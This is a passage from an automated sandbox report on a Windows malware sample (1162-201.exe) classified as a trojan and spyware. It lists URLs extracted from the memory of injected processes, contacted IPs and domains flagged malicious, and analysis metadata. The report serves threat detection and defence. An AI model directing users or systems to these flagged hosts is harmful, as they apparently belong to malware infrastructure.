                                                                http://www.68markavenue.netchkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://www.overlayoasis.questOtAlYRopPg.exe, 00000007.00000002.4625453218.00000000052AB000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                https://white.anva.org.cn/chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://www.nuoyunzhibo.comchkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://www.welovebeauty.netchkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://www.agrobazar.netOtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://www.hairdeluxe.netchkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://www.legalvideos.netchkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://www.xunaizhibo.com/bindingchkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://www.perfectpint.netchkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                https://zzlz.gsxt.gov.cn/chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://www.huayuzhibo.netchkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://www.theflowerpot.netchkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://www.babyzhibo.net/template/news/wandoujia/static/js/footer.fe363a40.jschkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://www.legalstrategy.netchkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://www.wuyezhibo.netchkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://www.chuncaozhibo.netchkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://www.babyzhibo.net/template/news/wandoujia/static/js/aggregatedentry.fe363a40.jschkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://www.babyzhibo.net/template/news/wandoujia/static/picture/qr-5_httpswww.wandoujia.comqr.pngOtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://www.rsbi.netchkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://www.implantcentre.netchkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://www.xingyuanzhibo.netchkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://www.easygram.netchkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://www.qinglizhibo.netchkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://www.liangmeizhibo.netchkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://www.yanyuzhibo.comchkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://www.mynewshub.netchkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://www.babyzhibo.net/template/news/wandoujia/static/js/index.umd.jschkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://www.startuptalent.netchkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://www.lovevintage.netchkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://www.gotogermany.netchkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://www.hiload.netchkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://www.babyzhibo.net/template/news/wandoujia/static/css/pcmodule.edd4638c5c3b3039832390269d40f1dchkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=chkntfs.exe, 00000006.00000002.4627180441.000000000756E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  http://www.biomedika.netchkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  http://www.luxbrand.netchkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  http://www.happystories.netchkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  https://www.ecosia.org/newtab/chkntfs.exe, 00000006.00000002.4627180441.000000000756E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    http://www.babyzhibo.net/template/news/wandoujia/static/js/footerbar.fe363a40.jschkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    http://www.babyzhibo.net/template/news/wandoujia/static/picture/anva-zilv.pngchkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    http://www.athousandwords.netchkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    http://www.babyzhibo.net/template/news/wandoujia/static/js/replyItem.fe363a40.jschkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    http://www.yanyangzhibo.comchkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    http://www.bodyonline.netchkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    http://www.babyzhibo.net/template/news/wandoujia/static/css/appsdetail.6f4104a5611f3a6cc38f23add3debchkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    http://www.babyzhibo.net/template/news/wandoujia/static/js/js.jschkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    http://www.losbravos.netchkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    http://www.megaos.netchkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    http://www.allprinting.netchkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    http://www.methlab.netchkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    http://www.qiyuezhibo.netchkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    http://www.huoyazhibo.netchkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    http://www.miaozhaozhibo.netchkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    http://www.naikuaizhibo.comchkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    http://www.babyzhibo.net/template/news/wandoujia/static/js/bl.jschkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    http://www.babyzhibo.net/template/news/wandoujia/static/js/header.fe363a40.jschkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    http://www.electrocat.netchkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    http://www.implantcentre.net/bindingchkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    http://www.liguizhibo.netchkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    http://www.qilinzhibo.netchkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    http://www.babyzhibo.net/template/news/wandoujia/static/picture/default_avatar.jpgOtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    http://www.anmozhibo.netchkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    http://www.aguardiente.netchkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    http://www.eurosupport.netchkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    http://www.xiapizhibo.netchkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    http://www.babyzhibo.net/template/news/wandoujia/static/js/tracker.fe363a40.jschkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    http://www.kleenair.netchkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown

                                                                    World Map of Contacted IPs

                                                                    • No. of IPs < 25%
                                                                    • 25% < No. of IPs < 50%
                                                                    • 50% < No. of IPs < 75%
                                                                    • 75% < No. of IPs

                                                                    Public IPs

                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                    47.83.1.90
                                                                    		www.ripbgs.infoUnited States
                                                                    		3209VODANETInternationalIP-BackboneofVodafoneDEtrue
                                                                    192.64.119.109
                                                                    		www.laduta.xyzUnited States
                                                                    		22612NAMECHEAP-NETUStrue
                                                                    76.223.67.189
                                                                    		infovea.techUnited States
                                                                    		16509AMAZON-02UStrue
                                                                    172.65.235.97
                                                                    		url.gname.netUnited States
                                                                    		13335CLOUDFLARENETUSfalse
                                                                    188.114.96.3
                                                                    		www.einpisalpace.shopEuropean Union
                                                                    		13335CLOUDFLARENETUStrue
                                                                    172.67.148.216
                                                                    		www.overlayoasis.questUnited States
                                                                    		13335CLOUDFLARENETUStrue
                                                                    192.186.58.31
                                                                    		www.babyzhibo.netUnited States
                                                                    		132721PING-GLOBAL-ASPingGlobalAmsterdamPOPASNNLtrue
                                                                    104.21.64.1
                                                                    		www.mzkd6gp5.topUnited States
                                                                    		13335CLOUDFLARENETUStrue
                                                                    136.243.64.147
                                                                    		100millionjobs.africaGermany
                                                                    		24940HETZNER-ASDEtrue
                                                                    162.0.236.169
                                                                    		www.explorevision.xyzCanada
                                                                    		22612NAMECHEAP-NETUStrue
                                                                    103.247.11.204
                                                                    		itcomp.storeIndonesia
                                                                    		58487RUMAHWEB-AS-IDRumahwebIndonesiaCVIDtrue

                                                                    Private

                                                                    IP
                                                                    127.0.0.1

                                                                    General Information

                                                                    Joe Sandbox version:42.0.0 Malachite
                                                                    Analysis ID:1587354
                                                                    Start date and time:2025-01-10 09:09:06 +01:00
                                                                    Joe Sandbox product:CloudBasic
                                                                    Overall analysis duration:0h 10m 35s
                                                                    Hypervisor based Inspection enabled:false
                                                                    Report type:full
                                                                    Cookbook file name:default.jbs
                                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                    Number of analysed new started processes analysed:8
                                                                    Number of new started drivers analysed:0
                                                                    Number of existing processes analysed:0
                                                                    Number of existing drivers analysed:0
                                                                    Number of injected processes analysed:2
                                                                    Technologies:
                                                                    • HCA enabled
                                                                    • EGA enabled
                                                                    • AMSI enabled
                                                                    Analysis Mode:default
                                                                    Analysis stop reason:Timeout
                                                                    Sample name:1162-201.exe
                                                                    Detection:MAL
                                                                    Classification:mal100.troj.spyw.evad.winEXE@7/2@15/12
                                                                    EGA Information:
